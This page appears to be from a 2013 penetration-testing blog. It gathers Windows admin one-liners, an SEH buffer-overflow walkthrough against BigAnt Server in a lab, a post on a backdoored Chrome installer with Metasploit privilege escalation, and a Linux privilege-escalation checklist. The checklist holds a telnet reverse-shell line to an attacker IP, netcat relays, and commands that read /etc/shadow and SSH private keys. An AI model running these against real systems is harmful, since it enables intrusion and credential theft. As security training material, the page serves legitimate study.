Wednesday, February 27, 2013

One liner commands - Windows

Remotely determine logged in user:
wmic /node:remotecomputer computersystem get username

List running processes:
wmic process list brief

Kill a process:
wmic process where name="cmd.exe" delete

Determine open shares:
net share
wmic share list brief

Determine IP address:
ipconfig

Get a new IP address:
ipconfig /release
ipconfig /renew

Remotely display machine’s MAC address:
wmic /node:machinename nic get macaddress

Remotely list running processes every second:
wmic /node:machinename process list brief /every:1

Remotely display System Info:
wmic /node:machinename computersystem list full

Disk drive information:
wmic diskdrive list full
wmic partition list full

Bios info:
wmic bios list full

List all patches:
wmic qfe

Look for a particular patch:
wmic qfe where hotfixid="KB958644" list full

Remotely List Local Enabled Accounts:
wmic /node:machinename USERACCOUNT WHERE "Disabled=0 AND LocalAccount=1" GET Name

Start a service remotely:
wmic /node:machinename 4 service lanmanserver CALL Startservice
sc \\machinename start lanmanserver

List services:
wmic service list brief
sc \\machinename query

Disable startup service:
sc config example disabled

List user accounts:
wmic useraccount list brief

Enable RDP remotely:
wmic /node:"machinename 4" path Win32_TerminalServiceSetting where AllowTSConnections="0" call SetAllowTSConnections "1"

List number of times a user logged on:
wmic netlogin where (name like "%adm%") get numberoflogons

Query active RDP sessions:
qwinsta /server:192.168.1.1

Remove active RDP session ID 2:
rwinsta /server:192.168.1.1 2

Remotely query registry for last logged in user:
reg query "\\computername\HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WinLogon" /v DefaultUserName

List all computers in domain “blah”:
dsquery computer "OU=example,DC=blah" -o rdn -limit 6000 > output.txt

Reboot:
shutdown /r /t 0

Shutdown:
shutdown /s /t 0

Remotely reboot machine:
shutdown /m \\192.168.1.1 /r /t 0 /f

Copy entire folder and its contents from a remote source to local machine:
xcopy /s \\remotecomputer\directory c:\local

Find the location of a file with the string "blah" in its name:
dir c:\ /s /b | find "blah"

Spawn a new command prompt:
start cmd

Determine name of a machine with known IP:
nbtstat -A 192.168.1.1

Find directory named blah:
dir c:\ /s /b /ad | find "blah"

Command line history:
F7

Determine the current user (the Linux whoami equivalent):
echo %USERNAME%

Determine who is a part of the administrators group:
net localgroup administrators

Add a user where bob is the username and password is blah:
net user bob blah /add

Add user bob to administrators group:
net localgroup administrators bob /add

List user accounts:
net user

Map a network share with a given drive letter of T:
net use T: \\serverNameOrIP\shareName

List network connections and the programs that are making those connections:
netstat -nba

Display contents of file text.txt:
type text.txt

Edit contents of file text.txt:
edit text.txt

Determine PC name:
hostname

Run cmd.exe as administrator user:
runas /user:administrator cmd

Uninstall a program, Symantec in this case ;-}:
wmic product where "description='Symantec'" call uninstall

Determine whether a system is 32 or 64 bit:
wmic cpu get DataWidth /format:list

PowerShell one-liner to download a file:
(new-object System.Net.WebClient).Downloadfile("http://example.com/file.txt", "C:\Users\bob\file.txt")

Information about OS version and other useful system information:
systeminfo

Startup applications:
wmic startup get caption,command

Recursively unzip all zip files (you'll need unzip.exe for this):
FOR /R %a IN (*.zip) DO unzip -d unzipDir "%a"

Saturday, February 9, 2013

Buffer Overflow SEH Overwrite part 3

BigAnt Server 2.52

First, the attacker enumerates machines on the internet using nmap etc. and finds a machine running BigAnt Server 2.52. Second, after conducting more enumeration on the target, the attacker sets up a test machine that mirrors it; in this situation I have used a Windows XP machine set up as a virtual machine. Third, I will refer to the test machine as 'victim', with an IP address of 172.16.94.133, and to the attacking machine as 'attacker', with an IP address of 172.16.94.173.

Attach the debugger to the running process "AntServer.exe".

Skeleton exploit to send to the "victim" machine.

Send the skeleton exploit to the victim machine; the debugger halts the program's execution flow with the ESI register overwritten by A's ("\x41", as seen in our skeleton exploit).

Still in the debugger, go to View > SEH chain. Notice our SEH chain has been overwritten with A's ("\x41") as well!

Go back to the main window and press SHIFT+F9 to pass the exception to the SEH handler; EIP is overwritten, again with A's ("\x41").

On the attacker's machine we generate a 2500-byte generic (non-repeating pattern) string using Metasploit.

Add the generic string we generated with Metasploit to our skeleton exploit, then resend the rewritten skeleton exploit.

This time ESI is overwritten with the value 6Cb7.

Again go to View > SEH chain. The SEH value is 42326742.

Using the above two values, 6Cb7 and 42326742, we can use Metasploit to determine our offsets. Rewrite the skeleton exploit to reflect the new information and resend it.

The debugger halts the program's execution flow; SHIFT+F9 passes the exception and EIP is overwritten with the four A's ("\x41" * 4), as predicted in the script above.

Using a Windows DLL to overwrite the structured exception handler: go to C:\WINDOWS\system32 and copy vbajet32.dll to the Metasploit directory on the attacking machine. On the attacker machine run the command "msfpescan -i vbajet32.dll" and look at the DLLCharacteristics field. The output is 0x0000000, i.e. no characteristics flags are set, which means we can use this DLL to locate an SEH overwrite address.
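As an added example (not the post's own code), here is a small Python reader for the same DllCharacteristics word that msfpescan -i reports, so a defender can audit which modules on a system were built without flags such as NO_SEH, NX_COMPAT or DYNAMIC_BASE (a 0x0 word, as in the post, means none of them are set). It handles both PE32 and PE32+ images; the flag values are taken from the PE/COFF specification, and the sample image bytes are constructed inline so the block runs offline.

```python
import struct

# IMAGE_DLLCHARACTERISTICS_* bits (PE/COFF specification)
DLL_CHARACTERISTICS = {
    0x0020: "HIGH_ENTROPY_VA",
    0x0040: "DYNAMIC_BASE",    # image may be relocated (ASLR)
    0x0080: "FORCE_INTEGRITY",
    0x0100: "NX_COMPAT",       # DEP compatible
    0x0400: "NO_SEH",          # image has no SEH handlers at all
    0x4000: "GUARD_CF",
}

def read_dll_characteristics(image):
    """Return the DllCharacteristics word from the optional header of a PE image (raw file bytes)."""
    if image[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    (e_lfanew,) = struct.unpack_from("<I", image, 0x3C)
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    opt = e_lfanew + 4 + 20                  # skip signature and the 20-byte COFF header
    (magic,) = struct.unpack_from("<H", image, opt)
    if magic not in (0x10B, 0x20B):          # PE32 / PE32+
        raise ValueError("unknown optional header magic 0x%x" % magic)
    # DllCharacteristics sits at offset 70 in both the PE32 and the PE32+ optional header
    (chars,) = struct.unpack_from("<H", image, opt + 70)
    return chars

def mitigation_report(image):
    """Map each known flag name to whether it is set, e.g. {'NO_SEH': False, ...}."""
    chars = read_dll_characteristics(image)
    return {name: bool(chars & bit) for bit, name in DLL_CHARACTERISTICS.items()}

def build_sample_pe(dll_characteristics, pe32plus=False):
    """Constructed sample: a header-only image, just enough for the parser above."""
    e_lfanew = 0x80
    dos = bytearray(e_lfanew)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, e_lfanew)
    machine = 0x8664 if pe32plus else 0x14C
    opt_size = 240 if pe32plus else 224
    coff = struct.pack("<HHIIIHH", machine, 0, 0, 0, 0, opt_size, 0x2102)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, 0x20B if pe32plus else 0x10B)
    struct.pack_into("<H", opt, 70, dll_characteristics)
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt)

if __name__ == "__main__":
    import sys
    # Audit a real module with: python pe_flags.py some.dll ; with no argument, use the sample
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample_pe(0)
    for name, on in sorted(mitigation_report(data).items()):
        print("%-16s %s" % (name, "set" if on else "MISSING"))
```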

In the main debugger window, go to the "E" button (between L and M on the main toolbar of OllyDbg). Click the "E" button and double-click "vbajet32.dll", then right-click and choose "Search for" > "Sequence of commands". A pop-up box will appear; type into the box:
POP r32
POP r32
RETN
Press "Find".

Copy the POP POP RETN values.

Set a breakpoint on the POP POP RETN address by pressing SHIFT+F2.

Rewrite the skeleton exploit to reflect the new information. Restart OllyDbg, set a breakpoint on 0F9A196A and resend the skeleton exploit.

We hit our breakpoint. Press SHIFT+F9. Notice we need to jump another 6 bytes to reach our NOPs. For this we use "\x90\x90\x06\xEB", which gives us the additional 6-byte jump needed to land in our NOP sled and then fall through to our shellcode.
Rewrite the skeleton exploit to reflect our 6-byte jump to the NOPs, with shellcode.

Set up a netcat listener on port 443 and resend the skeleton exploit, this time with no debugger attached to the running process on the victim machine.

A quick "ipconfig" on the victim machine confirms exploitation.

Now we have a working exploit to send across the internet to the machine originally found in our enumeration phase.

Wednesday, February 6, 2013

Fun backdooring Google-Chrome

*note: the backdooring technique will NOT be covered here!
The backdoored Google-Chrome, custom made to resemble an authentic Chrome installer.

After executing our exe file, Google-Chrome installs and is fully functional.

Attacking Machine:

Waiting on the attacking machine is a metasploit reverse listener on port 6666.

The ps command shows a list of running processes on the Windows machine.
Notice the services are running as the no-update\victim user, which indicates I only have "user" privileges. We need to find a way to escalate our privileges to "admin".

Using Metasploit's local privilege escalation exploit, which bypasses UAC controls and escalates our privileges to "admin".
Set the options.
Now we can add ourselves as "admin" users, enable remote desktop, enumerate passwords on the system, etc.

rooting a linux server part 1

http://download.vulnhub.com/vulnimage/vulnimage.zip

Gaining www-data access on a Linux server, using SQL authentication bypass, tamper data, and a php webshell trick.

Tuesday, February 5, 2013

Linux Priv Escalation

Full credit goes to g0tmi1k!!
http://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation.html

Operating System
What's the distribution type? What version?
cat /etc/issue
cat /etc/*-release
cat /etc/lsb-release
cat /etc/redhat-release


What's the Kernel version? Is it 64-bit?
cat /proc/version  
uname -a
uname -mrs
rpm -q kernel
dmesg | grep Linux
ls /boot | grep vmlinuz-


What can be learnt from the environmental variables?
cat /etc/profile
cat /etc/bashrc
cat ~/.bash_profile
cat ~/.bashrc
cat ~/.bash_logout
env
set


Is there a printer?
lpstat -a


Applications & Services
What services are running? Which service has which user privilege?
ps aux
ps -ef
top
cat /etc/service


Which service(s) are being run by root? Of these services, which are vulnerable? It's worth a double check!
ps aux | grep root
ps -ef | grep root


What applications are installed? What version are they? Are they currently running?
ls -alh /usr/bin/
ls -alh /sbin/
dpkg -l
rpm -qa
ls -alh /var/cache/apt/archives
ls -alh /var/cache/yum/


Any of the service(s) settings misconfigured? Are any (vulnerable) plugins attached?
cat /etc/syslog.conf
cat /etc/chttp.conf
cat /etc/lighttpd.conf
cat /etc/cups/cupsd.conf
cat /etc/inetd.conf
cat /etc/apache2/apache2.conf
cat /etc/my.conf
cat /etc/httpd/conf/httpd.conf
cat /opt/lampp/etc/httpd.conf
ls -aRl /etc/ | awk '$1 ~ /^.*r.*/' 2>/dev/null


What jobs are scheduled?
crontab -l
ls -alh /var/spool/cron
ls -al /etc/ | grep cron
ls -al /etc/cron*
cat /etc/cron*
cat /etc/at.allow
cat /etc/at.deny
cat /etc/cron.allow
cat /etc/cron.deny
cat /etc/crontab
cat /etc/anacrontab
cat /var/spool/cron/crontabs/root

Any plain text usernames and/or passwords?
grep -i user [filename]
grep -i pass [filename]
grep -C 5 "password" [filename]
find . -name "*.php" -print0 | xargs -0 grep -i -n "var $password"   # Joomla


Communications & Networking
What NIC(s) does the system have? Is it connected to another network?
/sbin/ifconfig -a
cat /etc/network/interfaces
cat /etc/sysconfig/network


What are the network configuration settings? What can you find out about this network? DHCP server? DNS server? Gateway?
cat /etc/resolv.conf
cat /etc/sysconfig/network
cat /etc/networks
iptables -L
hostname
dnsdomainname


What other users & hosts are communicating with the system?
lsof -i
lsof -i :80
grep 80 /etc/services
netstat -antup
netstat -antpx
netstat -tulpn
chkconfig --list
chkconfig --list | grep 3:on
last
w


What's cached? IP and/or MAC addresses
arp -e
route
/sbin/route -nee


Is packet sniffing possible? What can be seen? Listen to live traffic
# tcpdump tcp dst [ip] [port] and tcp dst [ip] [port]
tcpdump tcp dst 192.168.1.7 80 and tcp dst 10.2.2.222 21


Have you got a shell? Can you interact with the system?
# http://lanmaster53.com/2011/05/7-linux-shells-using-built-in-tools/
nc -lvp 4444    # Attacker. Input (Commands)
nc -lvp 4445    # Attacker. Output (Results)
telnet [attackers ip] 4444 | /bin/sh | telnet [attackers ip] 4445    # On the target system. Use the attacker's IP!


Is port forwarding possible? Redirect and interact with traffic from another view
# rinetd
# http://www.howtoforge.com/port-forwarding-with-rinetd-on-debian-etch

# fpipe
# FPipe.exe -l [local port] -r [remote port] -s [local port] [local IP]
FPipe.exe -l 80 -r 80 -s 80 192.168.1.7

# ssh -[L/R] [local port]:[remote ip]:[remote port] [local user]@[local ip]
ssh -L 8080:127.0.0.1:80 root@192.168.1.7    # Local Port
ssh -R 8080:127.0.0.1:80 root@192.168.1.7    # Remote Port

# mknod backpipe p ; nc -l -p [remote port] < backpipe  | nc [local IP] [local port] >backpipe
mknod backpipe p ; nc -l -p 8080 < backpipe | nc 10.1.1.251 80 >backpipe    # Port Relay
mknod backpipe p ; nc -l -p 8080 0 & < backpipe | tee -a inflow | nc localhost 80 | tee -a outflow 1>backpipe    # Proxy (Port 80 to 8080)
mknod backpipe p ; nc -l -p 8080 0 & < backpipe | tee -a inflow | nc localhost 80 | tee -a outflow & 1>backpipe    # Proxy monitor (Port 80 to 8080)


Is tunnelling possible? Send commands locally, remotely
ssh -D 127.0.0.1:9050 -N [username]@[ip]
proxychains ifconfig


Confidential Information & Users
Who are you? Who is logged in? Who has been logged in? Who else is there? Who can do what?
id
who
w
last
cut -d: -f1 /etc/passwd    # List of users
grep -v -E "^#" /etc/passwd | awk -F: '$3 == 0 { print $1}'   # List of super users
awk -F: '($3 == "0") {print}' /etc/passwd   # List of super users
cat /etc/sudoers
sudo -l


What sensitive files can be found?
cat /etc/passwd
cat /etc/group
cat /etc/shadow
ls -alh /var/mail/


Anything "interesting" in the home directory(ies)? If it's possible to access them
ls -ahlR /root/
ls -ahlR /home/


Are there any passwords in; scripts, databases, configuration files or log files? Default paths and locations for passwords
cat /var/apache2/config.inc
cat /var/lib/mysql/mysql/user.MYD
cat /root/anaconda-ks.cfg


What has the user been doing? Is there any password in plain text? What have they been editing?
cat ~/.bash_history
cat ~/.nano_history
cat ~/.atftp_history
cat ~/.mysql_history
cat ~/.php_history


What user information can be found?
cat ~/.bashrc
cat ~/.profile
cat /var/mail/root
cat /var/spool/mail/root


Can private-key information be found?
cat ~/.ssh/authorized_keys
cat ~/.ssh/identity.pub
cat ~/.ssh/identity
cat ~/.ssh/id_rsa.pub
cat ~/.ssh/id_rsa
cat ~/.ssh/id_dsa.pub
cat ~/.ssh/id_dsa
cat /etc/ssh/ssh_config
cat /etc/ssh/sshd_config
cat /etc/ssh/ssh_host_dsa_key.pub
cat /etc/ssh/ssh_host_dsa_key
cat /etc/ssh/ssh_host_rsa_key.pub
cat /etc/ssh/ssh_host_rsa_key
cat /etc/ssh/ssh_host_key.pub
cat /etc/ssh/ssh_host_key


File Systems
Which configuration files can be written in /etc/? Able to reconfigure a service?
ls -aRl /etc/ | awk '$1 ~ /^.*w.*/' 2>/dev/null     # Anyone
ls -aRl /etc/ | awk '$1 ~ /^..w/' 2>/dev/null        # Owner
ls -aRl /etc/ | awk '$1 ~ /^.....w/' 2>/dev/null    # Group
ls -aRl /etc/ | awk '$1 ~ /w.$/' 2>/dev/null          # Other

find /etc/ -readable -type f 2>/dev/null                         # Anyone
find /etc/ -readable -type f -maxdepth 1 2>/dev/null   # Anyone


What can be found in /var/ ?
ls -alh /var/log
ls -alh /var/mail
ls -alh /var/spool
ls -alh /var/spool/lpd
ls -alh /var/lib/pgsql
ls -alh /var/lib/mysql
cat /var/lib/dhcp3/dhclient.leases


Any settings/files (hidden) on website? Any settings file with database information?
ls -alhR /var/www/
ls -alhR /srv/www/htdocs/
ls -alhR /usr/local/www/apache22/data/
ls -alhR /opt/lampp/htdocs/
ls -alhR /var/www/html/


Is there anything in the log file(s) (Could help with "Local File Includes"!)
# http://www.thegeekstuff.com/2011/08/linux-var-log-files/
cat /etc/httpd/logs/access_log
cat /etc/httpd/logs/access.log
cat /etc/httpd/logs/error_log
cat /etc/httpd/logs/error.log
cat /var/log/apache2/access_log
cat /var/log/apache2/access.log
cat /var/log/apache2/error_log
cat /var/log/apache2/error.log
cat /var/log/apache/access_log
cat /var/log/apache/access.log
cat /var/log/auth.log
cat /var/log/chttp.log
cat /var/log/cups/error_log
cat /var/log/dpkg.log
cat /var/log/faillog
cat /var/log/httpd/access_log
cat /var/log/httpd/access.log
cat /var/log/httpd/error_log
cat /var/log/httpd/error.log
cat /var/log/lastlog
cat /var/log/lighttpd/access.log
cat /var/log/lighttpd/error.log
cat /var/log/lighttpd/lighttpd.access.log
cat /var/log/lighttpd/lighttpd.error.log
cat /var/log/messages
cat /var/log/secure
cat /var/log/syslog
cat /var/log/wtmp
cat /var/log/xferlog
cat /var/log/yum.log
cat /var/run/utmp
cat /var/webmin/miniserv.log
cat /var/www/logs/access_log
cat /var/www/logs/access.log
ls -alh /var/lib/dhcp3/
ls -alh /var/log/postgresql/
ls -alh /var/log/proftpd/
ls -alh /var/log/samba/
# auth.log, boot, btmp, daemon.log, debug, dmesg, kern.log, mail.info, mail.log, mail.warn, messages, syslog, udev, wtmp


If commands are limited, can you break out of the "jail" shell?
python -c 'import pty;pty.spawn("/bin/bash")'
python -c 'import os; os.system("/bin/bash")'
/bin/sh -i


How are file-systems mounted?
mount
df -h


Are there any unmounted file-systems?
cat /etc/fstab


What "Advanced Linux File Permissions" are used? Sticky bits, SUID & GUID
find / -perm -1000 -type d 2>/dev/null    # Sticky bit - Only the owner of the directory or the owner of a file can delete or rename here
find / -perm -g=s -type f 2>/dev/null    # SGID (chmod 2000) - run as the group, not the user who started it.
find / -perm -u=s -type f 2>/dev/null    # SUID (chmod 4000) - run as the owner, not the user who started it.

find / -perm -g=s -o -perm -u=s -type f 2>/dev/null    # SGID or SUID
for i in `locate -r "bin$"`; do find $i \( -perm -4000 -o -perm -2000 \) -type f 2>/dev/null; done    # Looks in 'common' places: /bin, /sbin, /usr/bin, /usr/sbin, /usr/local/bin, /usr/local/sbin and any other *bin, for SGID or SUID (Quicker search)

# find starting at root (/), SGID or SUID, not Symbolic links, only 3 folders deep, list with more detail and hide any errors (e.g. permission denied)
find / -perm -g=s -o -perm -4000 ! -type l -maxdepth 3 -exec ls -ld {} \; 2>/dev/null


Where can be written to and executed from? A few 'common' places: /tmp, /var/tmp, /dev/shm
find / -writable -type d 2>/dev/null        # world-writeable folders
find / -perm -222 -type d 2>/dev/null      # world-writeable folders
find / -perm -o+w -type d 2>/dev/null    # world-writeable folders

find / -perm -o+x -type d 2>/dev/null    # world-executable folders

find / \( -perm -o+w -perm -o+x \) -type d 2>/dev/null   # world-writeable & executable folders


Any "problem" files? World-writeable, "nobody" files
find / -xdev -type d \( -perm -0002 -a ! -perm -1000 \) -print   # world-writeable directories without the sticky bit
find /dir -xdev \( -nouser -o -nogroup \) -print   # files with no owner or group


Preparation & Finding Exploit Code
What development tools/languages are installed/supported?
find / -name perl*
find / -name python*
find / -name gcc*
find / -name cc


How can files be uploaded?
find / -name wget
find / -name nc*
find / -name netcat*
find / -name tftp*
find / -name ftp


Finding exploit code
http://www.exploit-db.com
http://1337day.com
http://www.securiteam.com
http://www.securityfocus.com
http://www.exploitsearch.net
http://metasploit.com/modules/
http://securityreason.com
http://seclists.org/fulldisclosure/
http://www.google.com


Finding more information regarding the exploit
http://www.cvedetails.com
http://packetstormsecurity.org/files/cve/[CVE]
http://cve.mitre.org/cgi-bin/cvename.cgi?name=[CVE]
http://www.vulnview.com/cve-details.php?cvename=[CVE]


(Quick) "Common" exploits. Warning: pre-compiled binary files. Use at your own risk.
http://tarantula.by.ru/localroot/
http://www.kecepatan.66ghz.com/file/local-root-exploit-priv9/


Mitigations
Is any of the above information easy to find?
Try doing it!
Set up a cron job which automates script(s) and/or 3rd-party products


Is the system fully patched? Kernel, operating system, all applications, their plugins and web services
apt-get update && apt-get upgrade
yum update


Are services running with the minimum level of privileges required?
For example, do you need to run MySQL as root?


Scripts: Can any of this be automated?!
http://pentestmonkey.net/tools/unix-privesc-check/
http://labs.portcullis.co.uk/application/enum4linux/
http://bastille-linux.sourceforge.net
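As an added example (not from the original checklist or any of the tools linked above), a small Python audit that the "cron job" and "can this be automated" points suggest: it walks a tree and reports the same two classes of "problem" files the File Systems section looks for (world-writeable entries without the sticky bit, and SUID/SGID files), so a nightly run can be diffed against the previous one. The sample tree it builds is constructed in a temporary directory so the block runs offline.

```python
import os
import stat
import tempfile

def audit_tree(root):
    """Walk root (not following symlinks) and return a list of (class, path) findings."""
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames + filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:            # permission denied or vanished: skip, like 2>/dev/null
                continue
            mode = st.st_mode
            if stat.S_ISLNK(mode):     # symlink modes are meaningless for this audit
                continue
            # world-writeable and no sticky bit (the sticky bit is what makes /tmp tolerable)
            if mode & stat.S_IWOTH and not mode & stat.S_ISVTX:
                findings.append(("WORLD_WRITABLE", path))
            # set-uid / set-gid regular files run as their owner/group, not the caller
            if stat.S_ISREG(mode) and mode & (stat.S_ISUID | stat.S_ISGID):
                findings.append(("SETID", path))
    return findings

def count(findings, cls):
    """Number of findings of one class, handy for a threshold check in cron."""
    return sum(1 for c, _ in findings if c == cls)

def demo():
    """Constructed sample tree: one world-writeable file, one SUID file, one clean file."""
    d = tempfile.mkdtemp()
    for name, mode in (("ww.conf", 0o666), ("helper", 0o4755), ("plain", 0o644)):
        p = os.path.join(d, name)
        with open(p, "w") as f:
            f.write("x\n")
        os.chmod(p, mode)
    return audit_tree(d)

if __name__ == "__main__":
    import sys
    # Real use: python audit.py /etc  (or /, and diff the output day to day)
    results = audit_tree(sys.argv[1]) if len(sys.argv) > 1 else demo()
    for cls, path in results:
        print(cls, path)
```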


Other (quick) guides & Links
Enumeration
http://www.0daysecurity.com/penetration-testing/enumeration.html
http://www.microloft.co.uk/hacking/hacking3.htm


Misc
http://jon.oberheide.org/files/stackjacking-infiltrate11.pdf
http://pentest.cryptocity.net/files/clientsides/post_exploitation_fall09.pdf
http://insidetrust.blogspot.com/2011/04/quick-guide-to-linux-privilege.html